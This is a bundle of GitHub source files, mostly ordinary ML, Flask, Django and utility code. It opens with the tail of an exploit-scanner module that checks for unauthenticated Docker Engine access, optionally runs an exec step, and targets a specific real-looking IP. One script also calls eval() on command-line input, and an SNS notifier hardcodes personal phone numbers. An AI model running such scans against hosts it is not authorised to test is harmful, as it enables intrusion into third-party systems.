{}'.format('Couchdb Unauth', url))\n # return {'name': 'Couchdb Unauth', 'url': url, 'software': 'Couchdb'}\n # except Exception:\n # return None\n\n async def attack(self, semaphore, pbar):\n async with semaphore:\n a = await self.detect()\n if a is not None:\n self.vulList.append(a)\n if self.flag:\n b = await self.exec()\n if b is not None:\n self.vulList.append(b)\n pbar.update(1)\n return self.vulList\n\n\nif __name__ == '__main__':\n pass\n # import requests\n # import hashlib\n #\n # resp = requests.get('https://50.84.113.154:8443/favicon.ico', verify=False)\n # if resp.status_code == 200:\n # m1 = hashlib.md5()\n # m1.update(resp.content)\n # theMD5 = m1.hexdigest()\n # print(theMD5)\n #\n semaphore = asyncio.Semaphore(500)\n sc = Script('116.30.7.120:2375', 1)\n l = asyncio.get_event_loop()\n 
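# A hedged illustration of the same unauthenticated-Docker-Engine check in plain
# synchronous form. The /containers/json endpoint and the 'HostConfig' marker come
# from the Script.detect() method above; the helper name, the default port, and the
# use of the `requests` library are assumptions for this sketch only.
import requests

def docker_api_is_open(host, port=2375, timeout=5):
    # An unauthenticated Docker Engine API answers GET /containers/json with
    # status 200 and container JSON whose entries carry a 'HostConfig' key.
    try:
        resp = requests.get('http://%s:%d/containers/json' % (host, port), timeout=timeout)
        return resp.status_code == 200 and 'HostConfig' in resp.text
    except requests.RequestException:
        return False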
l.run_until_complete(sc.attack(semaphore, tqdm(total=1)))\n","repo_name":"AkunWin/myscan","sub_path":"exploit/web/Unauth/Docker/Unauth.py","file_name":"Unauth.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"13034524881","text":"import json\nimport requests\nimport unittest\n\n\nclass APITestCase(unittest.TestCase):\n    def setUp(self):\n        # self.api_url = \"http://snowball.bot-e.com\"\n        self.api_url = \"http://localhost:6464\"\n        self.headers = {\"Content-Type\": \"application/json\"}\n\n    def test_api_endpoint(self):\n        prompt_data = {\"question\": \"what is the meaning of human life?\"}\n        response = requests.post(\n            f\"{self.api_url}/ask\", data=json.dumps(prompt_data), headers=self.headers\n        )\n        data = response.json()\n\n        # Check the response status code\n        self.assertEqual(response.status_code, 200)\n\n        # Check the response format based on the actual behavior\n        # self.assertIsInstance(data, dict)\n        self.assertTrue(\n            len(data[\"question_id\"]) == 11, \"The question_id is not 11 characters long\"\n        )\n        # ... Other assertions as needed\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"CulleyHarrelson/bot-e","sub_path":"bin/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13251578116","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math, torch, argparse\nfrom torch import nn\nfrom torch.autograd import Variable\n\n\n\ndef rand_points(n_points= 1, lb=-1, ub=1):\n    return np.random.uniform(lb, ub, n_points)\n\ndef create_dataset(fx, fy, dataset_size=200, look_back=1, epsilon=0.01):\n    random_x = rand_points(dataset_size, -1.5, 1.5)\n    random_y = rand_points(dataset_size, -1.5, 1.5)\n\n    data_in, data_out = [], []\n    for x, y in zip(random_x, random_y):\n        points = [(x + epsilon * fx(x, y), y + epsilon * fy(x, y))]\n\n        for i in range(look_back):\n            x1, y1 = points[-1]\n            points.append((x1 + epsilon * fx(x1, y1), y1 + epsilon * fy(x1, y1)))\n\n        data_in.append(points[:-1])\n        data_out.append(points[1:])\n\n    return np.array(data_in), np.array(data_out)\n\nclass lstm_reg(nn.Module):\n    def __init__(self, n_dim, seq_len, n_hidden, n_layers=1):\n        super(lstm_reg, self).__init__()\n\n        self.rnn = nn.LSTM(n_dim, n_hidden, n_layers, batch_first=True)\n        self.fc = nn.Linear(n_hidden * seq_len, n_dim)\n\n    def forward(self, x, times=1):\n        x, h = self.rnn(x)\n        x = self.fc(x)\n        outs = []\n        outs.append(x)\n        for i in range(times-1):\n            x, h = self.rnn(x, h)\n            x = self.fc(x)\n            outs.append(x)\n        if times > 1:\n            return outs\n        b, s, h = x.shape\n        return x\n\"\"\"\nseq_len= 10\ndataset_size= 1000\nlb, ub = -1, 1\nu = lambda x, y: xfield\nv = lambda x, y: yfield\n\n#u = lambda x, y: np.sin(2*x) + np.sin(2*y)\n#v = lambda x, y: np.cos(2*y)\n\nx, y = np.meshgrid(np.linspace(lb, ub, 10), np.linspace(lb, ub, 10))\nplt.quiver(x, y, u(x, y), v(x, y))\nplt.show()\n\ndata_in, data_out = create_dataset(u, v, dataset_size, seq_len, 0.03)\ntrain_in = torch.from_numpy(data_in.reshape(-1, seq_len, 2).astype(np.float32))\ntrain_out = torch.from_numpy(data_out.reshape(-1, seq_len, 2).astype(np.float32))\ntrain_in = train_in[:800]\ntrain_out = train_out[:800]\n\nnet = lstm_reg(2, 1, 20)\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(net.parameters(), lr=2e-2)\n\nfor e in range(1000):\n    out = net(train_in)\n    loss = criterion(out, train_out)\n\n    optimizer.zero_grad()\n    loss.backward()\n    
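# Descriptive note on the training step around this point: optimizer.zero_grad()
# clears gradients left over from the previous iteration, loss.backward() fills each
# parameter's .grad with dLoss/dParam, and optimizer.step() below then applies the
# Adam update from those gradients.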
optimizer.step()\n if (e + 1)% 100 == 0:\n print(loss)\n\nnet = net.eval()\nn_tests= 5\n\nx, y = np.meshgrid(np.linspace(lb, ub, 10), np.linspace(lb, ub, 10))\nplt.quiver(x, y, u(x, y), v(x, y))\n\nfor j in range(n_tests):\n x, y= rand_points(), rand_points()\n print(x, y)\n plt.plot(x, y, 'o')\n\n\n\nnet = net.eval()\nn_tests= 5\n\nx, y = np.meshgrid(np.linspace(lb, ub, 20), np.linspace(lb, ub, 20))\nplt.quiver(x, y, u(x, y), v(x, y))\n\nfor j in range(n_tests):\n x, y = rand_points(), rand_points()\n with torch.no_grad():\n init_point = torch.from_numpy(np.array((x, y)).reshape(1, 1, 2))\n init_point = init_point.to(torch.float32)\n\n\n all_points = net(init_point, 200)\n all_points = [x.numpy() for x in all_points]\n #for i in range(100):\n # init_point = net(init_point)\n # all_points.append(init_point.detach().numpy())\n\n all_points = np.array(all_points).reshape(-1, 2)\n plt.plot(*np.array(all_points).T)\n plt.plot(x, y, 'o', markersize=5, color=plt.gca().lines[-1].get_color())\n\nplt.show()\n\"\"\"\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='HW3 parser help')\n parser.add_argument('--param', metavar='param.json',\n help='parameter file name')\n parser.add_argument('-v', type=int, default=1, metavar='N',\n help='verbosity (default: 1)')\n parser.add_argument('--res-path', metavar='results',\n help='path of results')\n parser.add_argument('--x-field', metavar='x**2',\n help='expression of the x-component of the vector field')\n parser.add_argument('--y-field', metavar='y**2',\n help='expression of the y-component of the vector field')\n parser.add_argument('--lb', default=-1.0, metavar='LB',\n help='lower bound for initial conditions (default: -1)')\n parser.add_argument('--ub', default=1.0, metavar='UB',\n help='upper bound for initial conditions (default: 1)')\n parser.add_argument('--n-tests', default=3, metavar='N_TESTS',\n help='number of test trajectories to plot')\n args = parser.parse_args()\n\n \"\"\"\n os.chdir('param/')\n # Hyperparameters from json file\n with open(args.param) as paramfile:\n param = json.load(paramfile)\n \"\"\"\n\n lb = args.lb\n ub = args.ub\n xfield = args.x_field\n yfield = args.y_field\n ntests = args.n_tests\n\n seq_len= 10\n dataset_size= 1000\n\n u = lambda x, y: eval(xfield)\n v = lambda x, y: eval(yfield)\n print(1)\n #u = lambda x, y: np.sin(2*x) + np.sin(2*y)\n #v = lambda x, y: np.cos(2*y)\n\n x, y = np.meshgrid(np.linspace(lb, ub, 10), np.linspace(lb, ub, 10))\n plt.quiver(x, y, u(x, y), v(x, y))\n plt.show()\n\n data_in, data_out = create_dataset(u, v, dataset_size, seq_len, 0.03)\n train_in = torch.from_numpy(data_in.reshape(-1, seq_len, 2).astype(np.float32))\n train_out = torch.from_numpy(data_out.reshape(-1, seq_len, 2).astype(np.float32))\n train_in = train_in[:800]\n train_out = train_out[:800]\n\n net = lstm_reg(2, 1, 20)\n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(net.parameters(), lr=2e-2)\n\n for e in range(1000):\n out = net(train_in)\n loss = criterion(out, train_out)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (e + 1)% 100 == 0:\n print(loss)\n\n\n\n net = net.eval()\n n_tests= 5\n print(2)\n x, y = np.meshgrid(np.linspace(lb, ub, 20), np.linspace(lb, ub, 20))\n plt.quiver(x, y, u(x, y), v(x, y))\n\n for j in range(n_tests):\n x, y = rand_points(), rand_points()\n with torch.no_grad():\n init_point = torch.from_numpy(np.array((x, y)).reshape(1, 1, 2))\n init_point = init_point.to(torch.float32)\n\n\n all_points = net(init_point, 200)\n all_points = 
[x.numpy() for x in all_points]\n        #for i in range(100):\n        #    init_point = net(init_point)\n        #    all_points.append(init_point.detach().numpy())\n\n        all_points = np.array(all_points).reshape(-1, 2)\n        plt.plot(*np.array(all_points).T)\n        plt.plot(x, y, 'o', markersize=5, color=plt.gca().lines[-1].get_color())\n\n    os.chdir('plots/')\n    plt.savefig(\"Hegdeplot.pdf\")\n    plt.show()\n    print(3)\n","repo_name":"shivi47/PHYS-490-Machine-Learning","sub_path":"HW3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6581214709","text":"#coding=utf-8\n\nimport codecs\nimport json\n\nclass Config(dict):\n\tdef load(self, fileName):\n\t\tself.fileName = fileName\n\t\t# Default every switch to True\n\t\tself.update({\n\t\t\t'switch': True,\n\t\t\t'backgroundReading': True,\n\t\t\t'readChat': True,\n\t\t\t'readChatSender': False,\n\t\t\t'readChatGiftSponser': True,\n\t\t\t'omitChatGraphic': True,\n\t\t\t'infoCardPrompt': True,\n\t\t\t'readChapter': True,\n\t\t\t'checkUpdateAutomatic': True,\n\t\t\t'skipVersion': '0'\n\t\t})\n\t\t# Load switch states from the user's config file\n\t\ttry:\n\t\t\twith codecs.open(fileName) as file:\n\t\t\t\tself.update(json.load(file))\n\t\t\t\n\t\texcept:\n\t\t\tpass\n\t\t\n\t\n\tdef write(self):\n\t\twith codecs.open(self.fileName, 'w+', encoding='utf-8') as file:\n\t\t\tjson.dump(self, file, ensure_ascii=False)\n\t\t\n\t\n\nconf = Config()\n","repo_name":"maxe-hsieh/subtitle_reader","sub_path":"addon/globalPlugins/subtitle_reader/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"31"} +{"seq_id":"22821282706","text":"from functools import partial\n\nfrom torchnlp.encoders.text.static_tokenizer_encoder import StaticTokenizerEncoder\n\n\ndef _tokenize(s, tokenizer):\n    return [w.text for w in tokenizer(s)]\n\n\nclass SpacyEncoder(StaticTokenizerEncoder):\n    \"\"\" Encodes the text using spaCy's tokenizer.\n\n    **Tokenizer Reference:**\n    https://spacy.io/api/tokenizer\n\n    Args:\n        **args: Arguments passed onto ``StaticTokenizerEncoder.__init__``.\n        language (string, optional): Language to use for parsing. 
Accepted values\n are 'en', 'de', 'es', 'pt', 'fr', 'it', 'nl' and 'xx'.\n For details see https://spacy.io/models/#available-models\n **kwargs: Keyword arguments passed onto ``StaticTokenizerEncoder.__init__``.\n Example:\n\n >>> encoder = SpacyEncoder([\"This ain't funny.\", \"Don't?\"])\n >>> encoder.encode(\"This ain't funny.\")\n tensor([5, 6, 7, 8, 9])\n >>> encoder.vocab\n ['', '', '', '', '', 'This', 'ai', \"n't\", 'funny', '.', 'Do', '?']\n >>> encoder.decode(encoder.encode(\"This ain't funny.\"))\n \"This ai n't funny .\"\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n if 'tokenize' in kwargs:\n raise TypeError('``SpacyEncoder`` does not take keyword argument ``tokenize``.')\n\n try:\n import spacy\n except ImportError:\n print(\"Please install spaCy: \" \"`pip install spacy`\")\n raise\n\n # Use English as default when no language was specified\n language = kwargs.get('language', 'en')\n\n # All languages supported by spaCy can be found here:\n # https://spacy.io/models/#available-models\n supported_languages = ['en', 'de', 'es', 'pt', 'fr', 'it', 'nl', 'xx']\n\n if language in supported_languages:\n # Load the spaCy language model if it has been installed\n try:\n self.spacy = spacy.load(language, disable=['parser', 'tagger', 'ner'])\n except OSError:\n raise ValueError((\"Language '{0}' not found. Install using \"\n \"spaCy: `python -m spacy download {0}`\").format(language))\n else:\n raise ValueError(\n (\"No tokenizer available for language '%s'. \" + \"Currently supported are %s\") %\n (language, supported_languages))\n\n super().__init__(*args, tokenize=partial(_tokenize, tokenizer=self.spacy), **kwargs)\n\n def batch_encode(self, sequences):\n # Batch tokenization is handled by ``self.spacy.pipe``\n original = self.tokenize\n self.tokenize = lambda sequence: [token.text for token in sequence]\n return_ = super().batch_encode(self.spacy.pipe(sequences))\n self.tokenize = original\n return return_\n","repo_name":"PetrochukM/PyTorch-NLP","sub_path":"torchnlp/encoders/text/spacy_encoder.py","file_name":"spacy_encoder.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":2198,"dataset":"github-code","pt":"31"} +{"seq_id":"23724853704","text":"import boto3\n\ndef notify(message):\n boto = boto3.setup_default_session(profile_name='di')\n client = boto3.client('sns',\n region_name=\"us-east-1\")\n\n #arn:aws:sns:us-east-1:178603499269:TwitterStream\n\n # Send your sms message.\n try:\n r = client.publish(\n PhoneNumber=\"+12067553147\",\n Message=message\n )\n #print(r)\n return r\n except Exception as e:\n print(e)\n return e\n\n # Send your sms message.\n client.publish(\n PhoneNumber=\"+13023771148\",\n Message=message\n )","repo_name":"tttrinter/TwitterStreaming","sub_path":"Manager/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14545115812","text":"import os\nimport shutil\nfrom werkzeug.datastructures import FileStorage\nfrom werkzeug.utils import secure_filename\nfrom gogglekaap.models.memo import Memo as MemoModel\nfrom gogglekaap.models.user import User as UserModel\nfrom gogglekaap.models.label import Label as LabelModel\nfrom flask_restx import Namespace, Resource, fields, reqparse, inputs\nfrom flask import g, current_app\n\nns = Namespace(\n 'memos',\n description='메모 관련 API'\n)\n\nlabel = ns.model('Label', {\n 'id': fields.Integer(required=True, description='라벨 고유 
아이디'),\n 'content': fields.String(required=True, description='라벨 내용'),\n})\n\nmemo = ns.model('Memo', {\n 'id': fields.Integer(required=True, description='메모 고유 아이디'),\n 'user_id': fields.Integer(required=True, description='메모 작성자 유저 고유 번호'),\n 'title': fields.String(required=True, description='메모 제목'),\n 'content': fields.String(required=True, description='메모 내용'),\n 'linked_image': fields.String(required=False, description='메모 이미지'),\n 'is_deleted': fields.Boolean(description='메모 삭제 상태'),\n 'labels': fields.List(fields.Nested(label), description='연결된 라벨'),\n 'created_at': fields.DateTime(description='작성일'),\n 'updated_at': fields.DateTime(description='변경일')\n})\n\n\nparser = reqparse.RequestParser()\nparser.add_argument('title', required=True, help='메모 제목')\nparser.add_argument('content', required=True, help='메모 내용')\nparser.add_argument('linked_image', location='files', type=FileStorage, required=False, help='메모 이미지')\nparser.add_argument('is_deleted', required=False, type=inputs.boolean, help=\"메모 삭제 상태\")\nparser.add_argument('labels', action='split', help=\"라벨 내용 콤마 스트링\")\n\nput_parser = parser.copy()\nput_parser.replace_argument('title', required=False, help='메모 제목')\nput_parser.replace_argument('content', required=False, help='메모 내용')\n\nget_parser = reqparse.RequestParser()\nget_parser.add_argument('page', required=False, type=int, help='메모 페이지 번호')\nget_parser.add_argument('needle', required=False, location='args', help='메모 검색어')\nget_parser.add_argument('is_deleted', required=False, type=inputs.boolean, help=\"메모 삭제 상태\")\nget_parser.add_argument('label', required=False, help='라벨 내용')\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in {\n 'jpg',\n 'jpeg',\n 'png',\n 'gif'\n }\n\ndef randomword(length):\n import random, string\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(length))\n\ndef save_file(file):\n if file.filename == '':\n ns.abort(400)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n relative_path = os.path.join(\n current_app.static_url_path[1:],\n current_app.config['USER_STATIC_BASE_DIR'],\n g.user.user_id,\n 'memos',\n randomword(10),\n filename\n )\n upload_path = os.path.join(\n current_app.root_path,\n relative_path\n )\n os.makedirs(\n os.path.dirname(upload_path),\n exist_ok=True\n )\n file.save(upload_path)\n return relative_path, upload_path\n else:\n ns.abort(400)\n\n@ns.route(\"\")\nclass MemoList(Resource):\n @ns.marshal_list_with(memo, skip_none=True)\n @ns.expect(get_parser)\n def get(self):\n '''메모 복수 조회'''\n args = get_parser.parse_args()\n needle = args['needle']\n page = args['page']\n per_page = 15\n is_deleted = args['is_deleted']\n label = args['label']\n if is_deleted is None:\n is_deleted = False\n base_query = MemoModel.query.join(\n UserModel,\n UserModel.id == MemoModel.user_id\n ).filter(\n UserModel.id == g.user.id,\n MemoModel.is_deleted == is_deleted\n )\n if needle:\n needle = f'%%{needle}%%'\n base_query = base_query.filter(\n MemoModel.title.ilike(needle)|MemoModel.content.ilike(needle)\n )\n if label:\n base_query = base_query.filter(\n MemoModel.labels.any(LabelModel.id == label)\n )\n\n pages = base_query.order_by(\n MemoModel.created_at.desc()\n ).paginate(\n per_page=per_page,\n page=page\n )\n return pages.items\n\n @ns.marshal_list_with(memo, skip_none=True)\n @ns.expect(parser)\n def post(self):\n '''메모 생성'''\n args = parser.parse_args()\n memo = MemoModel(\n title=args['title'],\n 
content=args['content'],\n user_id=g.user.id\n )\n if args['is_deleted'] is not None:\n memo.is_deleted = args['is_deleted']\n file = args['linked_image']\n if file:\n relative_path, _ = save_file(file)\n memo.linked_image = relative_path\n labels = args['labels']\n if labels:\n for cnt in labels:\n if cnt:\n label = LabelModel.query.filter(\n LabelModel.content == cnt,\n LabelModel.user_id == g.user.id\n ).first()\n if not label:\n label = LabelModel(\n content=cnt,\n user_id=g.user.id\n )\n memo.labels.append(label)\n g.db.add(memo)\n g.db.commit()\n return memo, 201\n\n\n@ns.param(\"id\", '메모 고유 번호')\n@ns.route(\"/\")\nclass Memo(Resource):\n @ns.marshal_list_with(memo, skip_none=True)\n def get(self, id):\n '''메모 단수 조회'''\n memo = MemoModel.query.get_or_404(id)\n if g.user.id != memo.user_id:\n ns.abort(403)\n return memo\n\n @ns.marshal_with(memo, skip_none=True)\n @ns.expect(put_parser)\n def put(self, id):\n '''메모 업데이트'''\n args = put_parser.parse_args()\n memo = MemoModel.query.get_or_404(id)\n if g.user.id != memo.user_id:\n ns.abort(403)\n if args['title'] is not None:\n memo.title = args['title']\n if args['content'] is not None:\n memo.content = args['content']\n if args['is_deleted'] is not None:\n memo.is_deleted = args['is_deleted']\n file = args['linked_image']\n if file:\n relative_path, upload_path = save_file(file)\n if memo.linked_image:\n origin_path = os.path.join(\n current_app.root_path,\n memo.linked_image\n )\n if origin_path != upload_path:\n if os.path.isfile(origin_path):\n shutil.rmtree(os.path.dirname(origin_path))\n memo.linked_image = relative_path\n labels = args['labels']\n if labels:\n memo.labels.clear()\n for cnt in labels:\n if cnt:\n label = LabelModel.query.filter(\n LabelModel.content == cnt,\n LabelModel.user_id == g.user.id\n ).first()\n if not label:\n label = LabelModel(\n content=cnt,\n user_id=g.user.id\n )\n memo.labels.append(label)\n\n\n g.db.commit()\n return memo\n\n def delete(self, id):\n '''메모 삭제'''\n memo = MemoModel.query.get_or_404(id)\n if memo.user_id != g.user.id:\n ns.abort(403)\n g.db.delete(memo)\n g.db.commit()\n return '', 204\n\n@ns.route('//image')\n@ns.param('id', 'The memo identifier')\nclass MemoImage(Resource):\n\n def delete(self, id):\n '''메모 이미지 삭제'''\n memo = MemoModel.query.get_or_404(id)\n if g.user.id != memo.user_id:\n ns.abort(403)\n if memo.linked_image:\n origin_path = os.path.join(\n current_app.root_path,\n memo.linked_image\n )\n if os.path.isfile(origin_path):\n shutil.rmtree(os.path.dirname(origin_path))\n memo.linked_image = None\n g.db.commit()\n return '', 204\n","repo_name":"hidekuma/gogglekaap","sub_path":"gogglekaap/apis/memo.py","file_name":"memo.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"70029922010","text":"\narr = [int(x[:-1]) for x in open(\"/home/comrade/Funstuff/adventofcode2020/1/input.txt\").readlines()]\n\ndef twosum(sumval):\n hm = set()\n for x in range(len(arr)):\n needed = sumval-arr[x]\n if needed in hm:\n return needed,arr[x]\n hm.add(arr[x])\n return 0,0\n\nfor x in arr:\n v1,v2 = twosum(2020-x)\n if v1!=0:\n print(x,v1,v2)\n","repo_name":"c0mr4d3/adventofcode2020","sub_path":"1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43476706117","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import 
admin\nadmin.autodiscover()\nfrom qa.views import test, new_questions, popular_questions, one_question, ask, answer, signup, login\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'ask.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', 'qa.views.new_questions'),\n url(r'login/$', 'qa.views.login', name='login'),\n url(r'signup/$', 'qa.views.signup', name='signup'),\n url(r'ask/$', 'qa.views.ask', name='ask'),\n url(r'answer/$', 'qa.views.answer', name='anwer'),\n url(r'popular/$', 'qa.views.popular_questions', name='popular'),\n url(r'new/$', 'qa.views.new_questions', name='new'),\n url(r'question/(?P\\d+)/$', 'qa.views.one_question', name='question'),\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"pythonidea/webMaster","sub_path":"ask/ask/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14471587268","text":"from typing import List\nfrom setuptools import find_packages, setup\n\n# function to get requirements as a list\ndef get_requirements()->List[str]:\n \"\"\"\n Returns list of requirements\n \"\"\"\n requirements = []\n with open('requirements.txt', 'r') as req:\n content = req.read()\n\n for req in content.split('\\n'):\n requirements.append(req)\n\n return requirements\n\n# setup definition\nsetup(\n name=\"sensor\",\n version=\"0.0.1\",\n author=\"Saurabh Bhardwaj\",\n author_email=\"aryan.saurabhbhardwaj@gmail.com\",\n packages = find_packages(),\n install_requires=get_requirements(),\n)\n","repo_name":"Bhardwaj-Saurabh/Sensor_Fault_Detection_Scania","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16848893678","text":"import argparse\nimport logging\nimport os\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import randint\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import (\n GridSearchCV,\n RandomizedSearchCV,\n StratifiedShuffleSplit,\n train_test_split,\n)\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler\nfrom sklearn.tree import DecisionTreeRegressor\n\nfrom logger_main import configure_logger\n\nlogger = logging.getLogger(__name__)\n\nif __name__ == '__main__':\n \n # Use argparser to get the user command line input such as where to store data and pickle model\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--dataset', dest=\"dataset\", type=str, default='./data/raw/housing.csv',\n help='Path to dataset')\n parser.add_argument('--model-output', dest=\"model_output\", type=str, default='./artifacts',\n help='Output folder path for trained model')\n parser.add_argument('--log-level', dest=\"log_level\", type=str, default='DEBUG',\n help='Specify log level. e.g. `--log-level DEBUG, default is DEBUG')\n parser.add_argument('--log-path', dest=\"log_path\", type=str, default=False,\n help='use a log file or not. if yes give path,e.g. 
`--log-path ,default is not log file')\n parser.add_argument('--no-console-log', dest=\"log_console\", action=\"store_true\",\n help='toggle whether or not to write logs to the console')\n args = parser.parse_args()\n\n # Based on the user input from the terminal, set the file path and console output true/false\n\n if args.log_path is not False:\n log_file_path = os.path.join(args.log_path, 'log_file.log')\n else:\n log_file_path = None\n if args.log_console is True:\n console_input = False\n else:\n console_input = True\n \n # Configure the logger based on the user input from the terminal\n\n configure_logger(logger=None, cfg=None, log_file=log_file_path, console=console_input, log_level=args.log_level)\n\n housing = pd.read_csv(args.dataset)\n\n train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n\n housing[\"income_cat\"] = pd.cut(housing[\"median_income\"],\n bins=[0., 1.5, 3.0, 4.5, 6., np.inf], labels=[1, 2, 3, 4, 5])\n\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\n\n for train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n \n # visualize the housing data using lat and long\n \n housing = strat_train_set.copy()\n housing.plot(kind=\"scatter\", x=\"longitude\", y=\"latitude\")\n housing.plot(kind=\"scatter\", x=\"longitude\", y=\"latitude\", alpha=0.1)\n # Correlation matrix for housing\n corr_matrix = housing.corr()\n corr_matrix[\"median_house_value\"].sort_values(ascending=False)\n # select the numerical only data\n housing = strat_train_set.drop(\"median_house_value\", axis=1)\n housing_num = housing.drop('ocean_proximity', axis=1)\n \n # custom transformer for the new features mentioned above\n\n rooms_ix, bedrooms_ix, population_ix, households_ix = 3, 4, 5, 6\n\n class CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room=True):\n self.add_bedrooms_per_room = add_bedrooms_per_room\n\n def fit(self, X, y=None):\n return self\n \n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, households_ix]\n population_per_household = X[:, population_ix] / X[:, households_ix]\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household, bedrooms_per_room]\n attr_adder = CombinedAttributesAdder()\n housing_extra_attribs = attr_adder.transform(housing.values) \n housing_extra_attribs = pd.DataFrame(housing_extra_attribs,\n columns=list(housing.columns) \n + [\"rooms_per_household\", \"population_per_household\", \"bedrooms_per_room\"],\n index=housing.index)\n # pipe line to impute,add new attribute and sclar transfromation\n\n num_pipeline = Pipeline([('imputer', SimpleImputer(strategy=\"median\")),\n ('attribs_adder', CombinedAttributesAdder()), \n ('std_scaler', StandardScaler())])\n \n housing_num_tr = num_pipeline.fit_transform(housing_num)\n # drop labels for training set\n housing = strat_train_set.drop(\"median_house_value\", axis=1) \n housing_labels = strat_train_set[\"median_house_value\"].copy()\n # column transformer to combine both num and cat columns\n num_attribs = list(housing_num)\n cat_attribs = [\"ocean_proximity\"]\n full_pipeline = ColumnTransformer([(\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoder(), cat_attribs),])\n \n # final test data and lables for training are\n\n housing_prepared = full_pipeline.fit_transform(housing)\n housing_labels = 
strat_train_set[\"median_house_value\"].copy()\n\n lin_reg = LinearRegression()\n lin_reg.fit(housing_prepared, housing_labels)\n\n tree_reg = DecisionTreeRegressor(random_state=42)\n tree_reg.fit(housing_prepared, housing_labels)\n\n # random forest regressor with randomized search method\n forest_reg = RandomForestRegressor(random_state=42)\n param_distribs = {'n_estimators': randint(low=1, high=200), 'max_features': randint(low=1, high=8)}\n\n rnd_search = RandomizedSearchCV(forest_reg, param_distributions=param_distribs,\n n_iter=10, cv=5, scoring='neg_mean_squared_error', random_state=42)\n rnd_search.fit(housing_prepared, housing_labels)\n\n # random forest regressor with grid search method\n param_grid = [{'n_estimators': [3, 10, 30], 'max_features': [2, 4, 6, 8]},\n {'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]}\n ]\n forest_reg = RandomForestRegressor(random_state=42)\n \n grid_search = GridSearchCV(forest_reg, param_grid, cv=5, scoring='neg_mean_squared_error', return_train_score=True)\n grid_search.fit(housing_prepared, housing_labels)\n\n feature_importances = grid_search.best_estimator_.feature_importances_\n\n sorted(feature_importances, reverse=True)\n\n # store the models in to the user defined/artifacts folder\n\n def store_model(model_dir):\n \"\"\"\n Function to store the model files in to the user defined folder\n\n parameters\n ----------\n model_dir: directory path\n Directory where models will bestored\n\n returns\n ------\n Following models are generated,\n linear regression\n tree regression\n random serachCV\n gridsearchCV\n\n notes\n -----\n models are stored in .pkl extension [pickle files]\n \n \"\"\"\n os.makedirs(model_dir, exist_ok=True)\n with open(os.path.join(model_dir, 'lin_reg.pkl'), 'wb') as f:\n pickle.dump(lin_reg, f)\n with open(os.path.join(model_dir, 'tree_reg.pkl'), 'wb') as f:\n pickle.dump(tree_reg, f)\n with open(os.path.join(model_dir, 'rnd_search.pkl'), 'wb') as f:\n pickle.dump(rnd_search, f)\n with open(os.path.join(model_dir, 'grid_search.pkl'), 'wb') as f:\n pickle.dump(grid_search, f)\n # call the model function to generate and store the models\n store_model(args.model_output)\n","repo_name":"genuinesaravanan/mle-training","sub_path":"src/housing/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1019750173","text":"from Layout.Method_Class.logger import Logger\r\nfrom Layout.Ui_Layout.IB.Ui_ib_setting import Ui_ib_setting\r\nfrom PyQt6.QtWidgets import QDialog, 